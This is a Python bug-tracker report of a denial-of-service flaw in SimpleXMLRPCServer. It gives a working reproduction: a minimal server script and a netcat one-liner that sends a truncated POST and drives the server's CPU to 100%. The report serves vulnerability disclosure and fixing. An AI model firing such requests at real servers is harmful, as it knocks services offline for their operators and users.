Message153267
A denial of service flaw was found in the way Simple XML-RPC Server module of Python processed client connections, that were closed prior the complete request body has been received. A remote attacker could use this flaw to cause Python Simple XML-RPC based server process to consume excessive amount of CPU.
Credit:
Issue reported by Daniel Callaghan
References:
[1] https://bugzilla.redhat.com/show_bug.cgi?id=789790
Steps to reproduce:
------------------
A) for v3.2.2 version:
1) start server:
cat s.py
#!/usr/local/bin/python3
from xmlrpc.server import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()
2) # top
3) issue request from client:
echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345
Return to 'top' screen and see, how CPU consumption on particular host quickly moves to 100%.
B) for v2.7.2 version:
1) start server:
cat s.py
#!/usr/bin/python
from SimpleXMLRPCServer import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()
Steps 2) and 3) for v2.7.2 version are identical to
those for v3.2.2 version. |
|
Date |
User |
Action |
Args |
2012-02-13 13:45:34 | iankko | set | recipients:
+ iankko |
2012-02-13 13:45:34 | iankko | set | messageid: <1329140734.41.0.0376676358855.issue14001@psf.upfronthosting.co.za> |
2012-02-13 13:45:33 | iankko | link | issue14001 messages |
2012-02-13 13:45:32 | iankko | create | |
|